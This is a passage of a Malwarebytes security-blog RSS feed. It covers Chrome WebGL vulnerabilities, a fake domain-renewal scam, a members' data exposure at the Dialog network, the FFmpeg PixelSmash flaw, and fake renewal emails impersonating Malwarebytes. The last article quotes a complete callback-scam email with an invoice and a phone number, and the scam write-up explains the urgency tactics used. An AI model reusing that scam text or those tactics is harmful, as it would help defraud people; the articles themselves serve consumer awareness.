<figure class="wp-block-image aligncenter size-full"><img loading="lazy" width="715" height="342" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/up-to-date_e64443.png" alt="Chrome 149.0.7827.196/197 is up to date" class="wp-image-430092" /><figcaption class="wp-element-caption">Chrome 149.0.7827.196/197 is up to date</figcaption></figure>



<p class="wp-block-paragraph">You can find an explanation of the version numbering system and also find step-by-step instructions in our guide to&nbsp;<a href="https://www.malwarebytes.com/blog/explained/2025/06/how-to-update-chrome-on-every-operating-system" target="_blank" rel="noreferrer noopener">how to update Chrome on every operating system</a>.</p>



<h2 id="h-technical-details" class="wp-block-heading">Technical details</h2>



<p class="wp-block-paragraph">Let’s look at the two Critical WebGL vulnerabilities. WebGL, short for Web Graphics Library, is a browser technology that lets websites display interactive 2D and 3D graphics.</p>



<p class="wp-block-paragraph">We’ll start with the only vulnerability that wasn&#8217;t discovered by Google. It&#8217;s a use-after-free vulnerability in WebGL, tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-13028" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-13028</a>, that could allow an attacker to escape Chrome&#8217;s browser sandbox using a specially crafted HTML page.</p>



<p class="wp-block-paragraph">Use-after-free is a class of vulnerability caused by incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can abuse that mistake to crash a program or make it run code it should not run.</p>



<p class="wp-block-paragraph">The browser sandbox is a restricted, sealed-off environment that is supposed to contain any malicious activity within the browser rather than directly on your whole computer. So a sandbox escape is dangerous because it can help attackers move from “something bad happened inside the browser” to “something bad can affect the wider system.”</p>



<p class="wp-block-paragraph">The other Critical WebGL vulnerability is <a href="https://www.cve.org/CVERecord?id=CVE-2026-13032" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-13032</a>. It&#8217;s also a use-after-free  flaw that could allow a remote attacker to escape the sandbox via a crafted HTML page.</p>



<p class="wp-block-paragraph">Even without confirmed in‑the‑wild exploitation for these CVEs, Chrome has had several zero‑days exploited this year, so attackers clearly invest in web-based attacks. For example, <a href="https://www.cve.org/CVERecord?id=CVE-2026-2441" target="_blank" rel="noreferrer noopener nofollow">CVE‑2026‑2441</a>, which got its own <a href="https://www.malwarebytes.com/blog/news/2026/02/update-chrome-now-zero-day-bug-allows-code-execution-via-malicious-webpages" target="_blank" rel="noreferrer noopener">separate update</a>, allowed attackers to run code inside Chrome&#8217;s sandbox through a malicious web page. Paired with either of the WebGL flaws discussed above, it could have helped attackers break out of the browser&#8217;s protections. Together, those vulnerabilities could potentially have allowed attackers to take control of the wider system.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>Stop threats before they can do any harm.</strong></p>



<p class="wp-block-paragraph">Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. <a href="https://www.malwarebytes.com/browserguard" target="_blank" rel="noreferrer noopener">Add it to your browser →</a></p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/06/update-chrome-to-patch-critical-browser-security-flaws</link>
			<pubDate>Thu, 25 Jun 2026 11:04:48 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/06/update-chrome-to-patch-critical-browser-security-flaws</guid>
		</item>
				<item>
			<title><![CDATA[ Fake domain renewal emails trick website owners into paying scammers ]]></title>
			<description><![CDATA[ We uncovered fake domain renewal notices and convincing websites to pressure website owners into paying scammers. ]]></description>
								<category>Scams</category>
										<category>Threat Intel</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">You receive an email warning that your website&#8217;s domain name is about to expire. Renew now, it says, or your website and email could stop working. The link opens a professional-looking page that already knows your domain name, displays your registrar and expiry date, and starts a countdown timer. </p>



<p class="wp-block-paragraph">It feels urgent and personal, so it feels real.</p>



<p class="wp-block-paragraph">The site, branded <strong>Renovarix</strong>, doesn&#8217;t renew domains. Instead, it pushes visitors through a series of pages that collect personal information and eventually payment details.</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="612" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix1.png?w=1024" alt="Fake renewal domain" class="wp-image-429872" /></figure>



<h2 id="h-how-the-scam-works" class="wp-block-heading">How the scam works</h2>



<p class="wp-block-paragraph">Domain names really do expire, and losing one can be a serious problem. For many people and businesses, a domain is more than a web address. It&#8217;s your brand, your email, your search rankings, and the name customers type in when they want to find you. If it lapses, your website and email can stop working. If someone else registers it before you get it back, recovery can be difficult or impossible. That&#8217;s a lot to lose, and scammers know it.</p>



<p class="wp-block-paragraph">This scam takes advantage of that fear with a convincing fake renewal process.</p>



<p class="wp-block-paragraph">The email and website are fake. The &#8220;live registry data&#8221; is only partly real. Clicking <strong>Renew Now</strong> doesn&#8217;t renew your domain. Instead, it sends you through a chain of websites that first collect your name, address, phone number, and email, then eventually ask for payment details.</p>



<p class="wp-block-paragraph">If you deleted the email, there&#8217;s nothing to worry about. If you clicked the link, simply close the page. If you entered personal or payment information, follow the guidance above.</p>



<h2 id="h-the-email-that-starts-it" class="wp-block-heading">The email that starts it</h2>



<p class="wp-block-paragraph">The scam begins with an email, although the presentation varies. Some are crude: a plain &#8220;Domain Renewal Reminder&#8221; from a generic &#8220;Domain Services Inc.&#8221; with an invoice number and an amount due.</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="799" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix2.png?w=1024" alt="Fake renewal email" class="wp-image-429873" /></figure>



<p class="wp-block-paragraph">Others are much more polished, using the <strong>Renovarix</strong> brand, a reference number, and a respectable-looking London business address.</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="799" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix3.png?w=1024" alt="Fake renewal email" class="wp-image-429874" /></figure>



<p class="wp-block-paragraph">But they share the same giveaway. The &#8220;official&#8221; Renovarix renewal notice was sent from an ordinary Gmail address. A company claiming a London office and 24/7 support isn&#8217;t likely to send billing notices from Gmail. When the branding looks professional but the sender doesn&#8217;t match, that&#8217;s a major red flag.</p>



<h2 id="h-a-page-that-knows-too-much" class="wp-block-heading">A page that knows too much</h2>



<p class="wp-block-paragraph">The link opens a page that immediately performs a &#8220;lookup,&#8221; narrating its progress with messages such as &#8220;connecting to registry&#8221; and &#8220;fetching WHOIS records&#8221; before displaying your domain name, registrar, and expiry date.</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="612" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix4.png?w=1024" alt="Fake renewal domain" class="wp-image-429875" /></figure>



<p class="wp-block-paragraph">That makes it look as though the site has queried the official domain registry. Some of the information may come from genuine public records, but much of what makes the page appear authoritative is invented. For example, the displayed &#8220;Registry ID&#8221; isn&#8217;t retrieved from any registry. It&#8217;s generated locally in your browser from your domain name and exists purely to look official.</p>



<h2 id="h-everything-is-designed-to-push-your-panic-button" class="wp-block-heading">Everything is designed to push your panic button</h2>



<p class="wp-block-paragraph">Once that dashboard loads, the whole page becomes a funnel built to rush you.</p>



<p class="wp-block-paragraph">A red banner claims your domain expires in &#8220;03 days,&#8221; regardless of its real expiry date. A second countdown says a &#8220;special price&#8221; of €2.00, reduced from €9.99, expires in fifteen minutes. Try closing the page and a pop-up appears warning, &#8220;Wait — Your Domain Is At Risk!&#8221; with a dismiss button that reads, &#8220;No thanks, I&#8217;ll risk it.&#8221;</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="612" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix5.png?w=1024" alt="Fake renewal urgency" class="wp-image-429876" /></figure>



<p class="wp-block-paragraph">Legitimate registrars don&#8217;t rely on countdown timers or guilt-inducing pop-ups. The pressure is the scam.</p>



<h2 id="h-the-renewal-renews-nothing" class="wp-block-heading">The &#8220;renewal&#8221; renews nothing</h2>



<p class="wp-block-paragraph">Here&#8217;s the clearest sign something is wrong: clicking <strong>Renew Now</strong> doesn&#8217;t contact your registrar or process a renewal. It simply redirects your browser to another website.</p>



<p class="wp-block-paragraph">Some versions even display a cheerful &#8220;Renewal Complete!&#8221; confirmation with a new expiry date, confirmation number, and a message claiming a receipt has been emailed. None of it reflects a real transaction. Everything is generated in your browser.</p>



<h2 id="h-where-your-details-actually-go" class="wp-block-heading">Where your details actually go</h2>



<p class="wp-block-paragraph">The button sends you, through a marketing affiliate link, to a page called &#8220;Secure Checkout.&#8221; </p>



<figure class="wp-block-image size-large"><img loading="lazy" height="612" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix6.png?w=1024" alt="Checkout to harvest data" class="wp-image-429877" /></figure>



<p class="wp-block-paragraph">The page asks for your name, address, postcode, city, phone number, and email address. Once submitted, you&#8217;re passed through additional pages where payment is eventually requested.</p>



<figure class="wp-block-image size-large"><img loading="lazy" height="612" width="1024" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2026/06/renovarix7.png?w=1024" alt="Checkout to harvest data" class="wp-image-429878" /></figure>



<p class="wp-block-paragraph">Two details suggest this is a recycled scam kit rather than a genuine domain service. It can automatically populate your details from the link you clicked, and its fake five-star reviews still refer to &#8220;HappyPrizes&#8221; and how easy it was to &#8220;win something nice&#8221;—leftover text from an earlier prize scam that used the same template.</p>



<h2 id="h-why-people-fall-for-it" class="wp-block-heading">Why people fall for it</h2>



<p class="wp-block-paragraph">The scam works because it <strong>exploits a genuine concern</strong>. The scam starts with a believable premise. Domain renewals are a normal part of running a website, so an expiry notice doesn&#8217;t seem out of place. The scammers build on that with convincing branding, public domain information, and manufactured urgency.</p>



<p class="wp-block-paragraph">It also <strong>feels personal. </strong>Many people wonder how scammers knew about their specific domain. The answer is that they don&#8217;t know you personally. Every registered domain appears in public WHOIS/RDAP records, which include the domain name, registrar, important dates, and sometimes a contact email address. Scammers collect this information in bulk, then generate links that display your own domain details back to you. Seeing familiar information makes the page feel legitimate, even though it came from public records.</p>



<p class="wp-block-paragraph">Finally, <strong>the scam creates urgency. </strong>Countdown timers, warnings that your domain is at risk, and a €2.00 &#8220;special offer&#8221; are all designed to make you act before you stop to verify the claim. The low price isn&#8217;t the objective. Your personal information and payment details are.</p>



<p class="wp-block-paragraph">None of this makes a victim careless. It makes them human, targeted by people who know how a worried site owner reacts.</p>



<h2 id="h-what-to-do" class="wp-block-heading">What to do</h2>



<p class="wp-block-paragraph">If you receive an email like this, simply delete it. The safest way to handle any domain renewal is simple:</p>



<ul class="wp-block-list">
<li><strong>Don&#8217;t click on the email&#8217;s link.</strong> Go to your registrar through your own bookmark or by typing the address yourself and check your real expiry date there. If you clicked the link, close the page. Looking at it doesn&#8217;t put your domain at risk.</li>



<li><strong>Know who your registrar is.</strong> Renewal happens in the account you already have, not on a website you&#8217;ve never heard of.</li>



<li><strong>Treat urgency as a warning sign</strong>, not a reason to hurry. Real renewals aren&#8217;t fifteen-minute emergencies.</li>



<li><strong>Check the sender.</strong> Billing notices from a Gmail address, or a brand name that doesn&#8217;t match your actual provider, are red flags.</li>



<li><a href="https://www.malwarebytes.com/browserguard" target="_blank" rel="noreferrer noopener">Malwarebytes Browser Guard</a> is free and can help block scam and phishing pages while you browse.</li>
</ul>



<p class="wp-block-paragraph" id="h-if-you-already-entered-your-details-if-you-entered-personal-information-such-as-your-name-address-phone-number-or-email-address"><strong>If you already entered personal information</strong> (such as your name, address, phone number, or email address):</p>



<ul class="wp-block-list">
<li>Be prepared for follow-up scams. Attackers may contact you by phone or email, claiming to be your registrar or referring to your domain, an &#8220;order,&#8221; or a &#8220;renewal.&#8221;</li>



<li>Don&#8217;t trust unsolicited calls or emails, even if they seem to know details about your domain.</li>



<li>If you need to contact your registrar or bank, use contact details from their official website, not those provided in the email or on the scam page.</li>
</ul>



<p class="wp-block-paragraph"><strong>If you entered payment card details:</strong></p>



<p class="wp-block-paragraph" id="h-if-you-already-entered-your-details">Turn on transaction alerts so you&#8217;re notified as soon as your card is used.</p>



<p class="wp-block-paragraph">Contact your bank or card issuer immediately. Tell them you entered your card details on a fraudulent website and ask whether they recommend blocking and replacing the card, even if you don&#8217;t see any unauthorized charges yet.</p>



<p class="wp-block-paragraph">Monitor your account closely. Scammers sometimes make small &#8220;test&#8221; charges before attempting larger transactions.</p>



<h2 id="h-indicators-of-compromise" class="wp-block-heading">Indicators of compromise</h2>



<ul class="wp-block-list">
<li><code>renovarix[.]org</code> — fake domain renewal page</li>



<li><code>xe54ghj[.]com</code> — redirector</li>



<li><code>paysuccessful[.]site</code> — personal-data capture page</li>



<li><code>molipy8trk[.]com</code> — redirector</li>



<li><code>topprogressstores[.]online</code> — final offer landing</li>
</ul>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>We don’t just report on threats—we remove them</strong></p>



<p class="wp-block-paragraph">Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by&nbsp;<a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/threat-intel/2026/06/fake-domain-renewal-emails-trick-website-owners-into-paying-scammers</link>
			<pubDate>Thu, 25 Jun 2026 10:26:48 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/threat-intel/2026/06/fake-domain-renewal-emails-trick-website-owners-into-paying-scammers</guid>
		</item>
				<item>
			<title><![CDATA[ Elite network says it was hacked after members&#8217; personal data was left exposed ]]></title>
			<description><![CDATA[ Personal data belonging to politicians, military leaders, and executives was left publicly accessible in what looks like a security misconfiguration. ]]></description>
								<category>Data breaches</category>
										<category>News</category>
										<category>Privacy</category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Some organizations exist to be exclusive. They&#8217;re invite-only, and discreet, the kind of place where the membership directory is the product. </p>



<p class="wp-block-paragraph">Dialog, the exclusive network founded by billionaire investor and PayPal co-founder Peter Thiel, whose members include a sitting NATO commander, two US senators, and the US Treasury Secretary, is one of those. </p>



<p class="wp-block-paragraph">Last week, information on hundreds of those members was sitting in plaintext on its app distribution site, visible to anyone who knew how to right-click. Then Dialog said it had been hacked.</p>



<h2 id="h-a-signup-page-that-led-straight-to-members-files" class="wp-block-heading"><strong>A signup page that led straight to members&#8217; files</strong></h2>



<p class="wp-block-paragraph">The site was set up to distribute a phone app to support an upcoming gathering for the network, which arranges high-end get-togethers. Any visitor could sign up using any email address. It did not request a password.</p>



<p class="wp-block-paragraph">After submitting an email, the visitor landed on a near-empty holding page that reportedly loaded internal files on roughly 200 high-profile people directly into their browser. They were visible using &#8220;tools built into every major browser,&#8221; which appears to refer to the browser&#8217;s built-in developer tools.</p>



<p class="wp-block-paragraph">Those files were not minimal. Loading the questionnaire forms returned dates of birth, emergency contacts, cell phone numbers, the political leanings Dialog assigns to its members, internal rankings and grading notes, and the digital keys that serve as members&#8217; logins. For nearly all of them, the exposed data was comprehensive, from private contact information through to active login tokens.</p>



<p class="wp-block-paragraph">The records also included a current White House intelligence official, a retired general who held a senior role in US intelligence, and the heads of national security policy at two leading AI firms. Dialog also privately scores attendees, weighing their wealth and prominence in decisions about admission, seating, and pricing. Those scores were among the things sitting in the public HTML.</p>



<h2 id="h-dialog-on-the-defensive" class="wp-block-heading">Dialog on the defensive</h2>



<p class="wp-block-paragraph">Dialog&#8217;s managing director described the access as a hack</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph"> &#8220;executed by a well-known criminal who is wanted in the United States.&#8221; </p>
</blockquote>



<p class="wp-block-paragraph">WIRED, which <a href="https://www.wired.com/story/dialog-hack-website-misconfiguration/" target="_blank" rel="noreferrer noopener nofollow">broke the story</a>, found no evidence that any break-in was required. In fact, it seems to have involved little more than clicking on a link on a web page.</p>



<p class="wp-block-paragraph">The forms were built using Fillout, a popular online form builder. The data was stored in Airtable, a widely used cloud database platform. Fillout said it was unaware of any compromise to its own systems and noted that customers are responsible for configuring their forms, connected data sources, and workflows.</p>



<p class="wp-block-paragraph">Dialog has not said when the misconfigured page first went live, meaning members&#8217; data could have been openly accessible for an indeterminate period before it was discovered.</p>



<p class="wp-block-paragraph">Security misconfiguration now <a href="https://owasp.org/Top10/2025/A02_2025-Security_Misconfiguration/?featured_on=talkpython" target="_blank" rel="noreferrer noopener nofollow">ranks #2</a> on the OWASP Top 10 for 2025, which is an industry list of the top application security risks. It has risen from #5 in 2021. The category accounts for more than 719,000 of documented security weaknesses.</p>



<p class="wp-block-paragraph">The fix is also routine: build systems with only the features you need, and configure them securely.</p>



<h2 id="h-what-this-means-for-the-rest-of-us" class="wp-block-heading">What this means for the rest of us</h2>



<p class="wp-block-paragraph">How organizations describe incidents matters beyond a single breach. If simply accessing publicly available information is routinely labeled a &#8220;hack,&#8221; security researchers may become more reluctant to investigate and responsibly disclose exposed systems, leaving misconfigurations undiscovered for longer.</p>



<p class="wp-block-paragraph">For end users, the lesson is older than the internet. If an organization collects your date of birth, your emergency contacts, and a private score of how much you&#8217;re worth to them, ask where that data lives. Any answer involving &#8220;our website&#8221; deserves a second question, and anything that stops at &#8220;we take your security very seriously&#8221; deserves further questioning.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/privacy/2026/06/elite-network-says-it-was-hacked-after-members-personal-data-was-left-exposed</link>
			<pubDate>Thu, 25 Jun 2026 09:08:05 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/privacy/2026/06/elite-network-says-it-was-hacked-after-members-personal-data-was-left-exposed</guid>
		</item>
				<item>
			<title><![CDATA[ PixelSmash flaw turns video files into attack tools ]]></title>
			<description><![CDATA[ Researchers have found a critical FFmpeg flaw that could let attackers use a malicious video file to compromise vulnerable systems. ]]></description>
								<category>Bugs</category>
										<category>News</category>
										<category><![CDATA[ CVE-2026-8461 ]]></category>
										<category><![CDATA[ ffmpeg ]]></category>
										<category><![CDATA[ MagicYUV ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">A newly discovered vulnerability in FFmpeg’s MagicYUV decoder can turn a tiny, malformed video into a foothold for attackers.</p>



<p class="wp-block-paragraph"><a href="https://jfrog.com/blog/pixelsmash-critical-ffmpeg-vulnerability-turns-media-files-into-weapons/" target="_blank" rel="noreferrer noopener nofollow">Researchers</a> have disclosed PixelSmash, a critical vulnerability tracked as <a href="https://www.cve.org/CVERecord?id=CVE-2026-8461" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-8461</a>, in FFmpeg’s MagicYUV video decoder with a <a href="https://www.malwarebytes.com/blog/news/2025/11/how-cvss-v4-0-works-characterizing-and-scoring-vulnerabilities" target="_blank" rel="noreferrer noopener">CVSS score</a> of 8.8.</p>



<p class="wp-block-paragraph">By crafting a specially formatted AVI, MKV, or MOV file, an attacker can crash or potentially execute code on any system that tries to generate a thumbnail, extract metadata, or play the file with a vulnerable version of FFmpeg.</p>



<h2 id="h-what-is-ffmpeg-and-is-this-serious" class="wp-block-heading">What is FFmpeg and is this serious?</h2>



<p class="wp-block-paragraph">FFmpeg is an open‑source toolkit for recording, converting, and streaming audio and video, and its <a href="https://www.ffmpeg.org/libavcodec.html" target="_blank" rel="noreferrer noopener nofollow">libavcodec library</a> implements hundreds of audio and video decoders. </p>



<p class="wp-block-paragraph">One of those is <a href="https://www.magicyuv.com/" target="_blank" rel="noreferrer noopener nofollow">MagicYUV</a>, a lossless codec popular in video editing workflows and, crucially, enabled by default in upstream FFmpeg and all the Linux distribution packages the researchers tested up to FFmpeg 9.0.</p>



<p class="wp-block-paragraph">The impact is more serious than you may think. If you run anything that touches video—from a Linux desktop to a Jellyfin or Nextcloud server, or even an AI model that ingests clips—you probably rely on FFmpeg under the hood.</p>



<p class="wp-block-paragraph">It’s hard to put an exact number on how many systems are affected, but it helps to know that:</p>



<ul class="wp-block-list">
<li>Tens of millions of Linux systems rely on <code>ffmpegthumbnailer</code> and system <code>libavcodec</code> for thumbnails, meaning “just browsing a folder” can trigger the bug if a malicious file is present.</li>



<li>Jellyfin and Nextcloud, among the most popular self‑hosted media and file platforms globally, each have at least tens of thousands of active internet‑reachable servers. Almost all of those that did not update FFmpeg or disable MagicYUV are vulnerable to denial of service (DoS) and, in some configurations, targeted remote code execution (RCE) attacks.</li>



<li>A large fraction of consumer network attached storage (NAS) and smart TV platforms use FFmpeg for previews and thumbnails. These devices are sold in the millions.</li>
</ul>



<p class="wp-block-paragraph">The most worrying part of PixelSmash is how little it takes to trigger it. All you need is an application that uses FFmpeg to process untrusted media and has the MagicYUV decoder compiled in.</p>



<p class="wp-block-paragraph">PixelSmash is a good illustration of a broader problem in the open‑source ecosystem: a bug in a deep dependency that silently propagates everywhere.</p>



<h2 id="h-how-to-protect-yourself" class="wp-block-heading">How to protect yourself</h2>



<p class="wp-block-paragraph">This vulnerability is not something most home users need to worry about. It needs to be taken care of upstream. Users of affected Linux distributions should keep an eye out for FFmpeg updates or security updates from their distro.</p>



<p class="wp-block-paragraph">But if you’re responsible for systems that handle video, you should assume you are affected until you prove otherwise. The main mitigation steps are:</p>



<ul class="wp-block-list">
<li><strong>Update FFmpeg. </strong>FFmpeg version 8.1.2, released on June 17, 2026, includes a fix for CVE‑2026‑8461. If your distribution or vendor provides an updated FFmpeg, install it across desktops, servers, and containers.</li>



<li><strong>Check if MagicYUV is enabled</strong> and disable it or apply patches where possible.</li>



<li><strong>Reduce automatic processing of untrusted video.</strong> Review which preview providers and thumbnailers are enabled, especially for rarely used formats.</li>
</ul>



<p class="wp-block-paragraph">Finally, it is worth watching for abnormal crashes of media players, thumbnailers, or media servers, especially after opening or downloading a new video file. You should treat repeated crashes or missing thumbnails as potential indicators of malicious content until systems are patched.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<p class="wp-block-paragraph"><strong>We don’t just report on threats—we remove them</strong></p>



<p class="wp-block-paragraph">Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by&nbsp;<a href="https://www.malwarebytes.com/for-home">downloading Malwarebytes today</a>.</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/news/2026/06/pixelsmash-flaw-turns-video-files-into-attack-tools</link>
			<pubDate>Wed, 24 Jun 2026 17:23:41 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/news/2026/06/pixelsmash-flaw-turns-video-files-into-attack-tools</guid>
		</item>
				<item>
			<title><![CDATA[ Watch out for renewal scams pretending to be Malwarebytes ]]></title>
			<description><![CDATA[ Scammers are sending fake software renewal notices that claim you've been charged for a subscription. Some even impersonate Malwarebytes. ]]></description>
								<category>Product</category>
										<category>Scams</category>
										<category><![CDATA[ Malwarebytes ]]></category>
										<category><![CDATA[ renewal ]]></category>
										<category><![CDATA[ scam ]]></category>
									<content:encoded><![CDATA[
<p class="wp-block-paragraph">Fake subscription renewal notices are doing the rounds again. Some of these scams impersonate Malwarebytes, and we&#8217;ve also seen them reach our customers.</p>



<p class="wp-block-paragraph">You&#8217;re more likely to trust the message if you&#8217;re already a customer of the company mentioned in the email. That&#8217;s what the scammers are counting on.</p>



<p class="wp-block-paragraph">So we want to make people aware that these scams are becoming increasingly common, and explain how to spot them.</p>



<p class="wp-block-paragraph">Software renewal scams (including fake Malwarebytes “renewal” emails and <a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/fake-malwarebytes-renewal-notices-in-your-calendar" target="_blank" rel="noreferrer noopener">calendar invites</a>) are a specific, very active form of phishing and tech support fraud that contribute to <a href="https://www.europeanpaymentscouncil.eu/sites/default/files/kb/file/2025-12/EPC162-24%20v2.0%202025%20Payments%20Threats%20and%20Fraud%20Trends%20Report_0.pdf" target="_blank" rel="noreferrer noopener nofollow">millions of dollars in losses every year</a>.</p>



<h2 id="h-what-to-look-out-for" class="wp-block-heading">What to look out for</h2>



<p class="wp-block-paragraph">The template is easy enough to recognize once you know how to spot the signs:</p>



<ul class="wp-block-list">
<li>The sender&#8217;s email address doesn&#8217;t belong to the company the sender claims to represent. Often the messages come from compromised accounts or from lookalike domains designed to appear legitimate. Always check the sender&#8217;s email address carefully.</li>



<li>The emails will often include lots of official-looking (but made-up) details and reference numbers, along with a charge large enough to provoke concern. The amount is typically several hundred dollars, but it can be much higher.</li>



<li>The message usually ends with a phone number to call or a link where you can supposedly dispute the charge. The wording and amounts vary from scam to scam. The phone numbers change too, often using local-looking numbers or hosted voice services to appear more trustworthy. Below is one example we saw that uses a callback lure, encouraging the target to call a phone number and engage with a <a href="https://www.malwarebytes.com/blog/how-to/2023/05/how-to-spot-and-avoid-a-tech-support-scam" target="_blank" rel="noreferrer noopener">tech support scam</a>:</li>
</ul>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph"><strong>Subject:</strong> Account Maintenance Update</p>



<p class="wp-block-paragraph"><strong>From:</strong> &lt;redacted sender name&gt; &lt;redacted-email@example.com&gt;</p>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<p class="wp-block-paragraph">Your order for Malwarebytes Ultimate Protection has been confirmed. The total amount of <strong>$276.50 USD</strong> has been successfully charged.</p>



<p class="wp-block-paragraph"><strong>Invoice Details:</strong></p>



<p class="wp-block-paragraph">Invoice #: INV‑ZIDNQCWSMO<br>Product: Ultimate Security Pack<br>License Term: 3 Years<br>Seats: 3 Devices<br>Subtotal: $276.50 USD<br>Tax: $0.00 USD<br><strong>Grand Total: $276.50 USD</strong><br>Activation Code: 8fd14ea8‑4014‑4430‑ba19‑313554098112</p>



<p class="wp-block-paragraph">Your license is now active and will renew automatically.</p>



<p class="wp-block-paragraph">For billing inquiries, reach us at <strong>+1 (810) 210‑5434</strong>.</p>
</blockquote>



<hr class="wp-block-separator has-alpha-channel-opacity" />



<ul class="wp-block-list">
<li>Other fake renewal notices may pretend to come from PayPal or other payment providers and direct you to a website where you&#8217;re asked to log in. These are phishing emails trying to steal your banking credentials.</li>
</ul>



<h2 id="h-how-to-stay-safe" class="wp-block-heading">How to stay safe</h2>



<p class="wp-block-paragraph">If you receive a subscription renewal communication claiming to be from us, our <a href="https://help.malwarebytes.com/hc/en-us/articles/31589240290971-Verify-subscription-renewal-email-is-legitimate" target="_blank" rel="noreferrer noopener">Help Center article</a> explains how our legitimate renewal notices work and how to verify they&#8217;re genuine.</p>



<p class="wp-block-paragraph">In general:</p>



<ul class="wp-block-list">
<li>Do not click links or call phone numbers in unsolicited emails.</li>



<li>When in doubt, check the origin of the email by going directly to the company’s official website and ask about it through official channels. Don&#8217;t follow sponsored search results to get there, as these can be scams.</li>



<li>Do not give out personal details, pins, passwords, payment information, or verification codes during an unsolicited call. Legitimate companies will not ask for passwords or verification codes over the phone.</li>



<li>Never allow a stranger to take over your computer remotely. It allows scammers to quickly search your computer for valuable information.</li>
</ul>



<p class="wp-block-paragraph"><strong>Pro tip:</strong> <a href="https://www.malwarebytes.com/blog/product/2026/02/scam-guard-for-desktop-a-second-set-of-eyes-for-suspicious-moments" target="_blank" rel="noreferrer noopener">Malwarebytes Scam Guard</a> can help you determine whether an email is a scam and advise you on the next steps.</p>



<hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" />



<h3 class="wp-block-heading" id="h-something-feel-off-check-it-before-you-click-nbsp-nbsp"><strong>Something feel off? Check it before you click.&nbsp;</strong>&nbsp;</h3>



<p class="wp-block-paragraph"><strong>Malwarebytes Scam Guard</strong>&nbsp;helps you&nbsp;analyze&nbsp;suspicious links, texts, and screenshots instantly.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph">Available with&nbsp;<a href="https://www.malwarebytes.com/premium" target="_blank" rel="noreferrer noopener">Malwarebytes Premium Security</a>&nbsp;for all your devices, and in the&nbsp;<a href="https://www.malwarebytes.com/mobile" target="_blank" rel="noreferrer noopener">Malwarebytes app for iOS and Android</a>.&nbsp;&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/solutions/scam-guard" target="_blank" rel="noreferrer noopener">Try it free →</a>&nbsp;</p>
]]></content:encoded>
							<link>https://www.malwarebytes.com/blog/scams/2026/06/watch-out-for-renewal-scams-pretending-to-be-malwarebytes</link>
			<pubDate>Wed, 24 Jun 2026 14:18:13 GMT</pubDate>
			<guid>https://www.malwarebytes.com/blog/scams/2026/06/watch-out-for-renewal-scams-pretending-to-be-malwarebytes</guid>
		</item>
					</channel>
		</rss>
		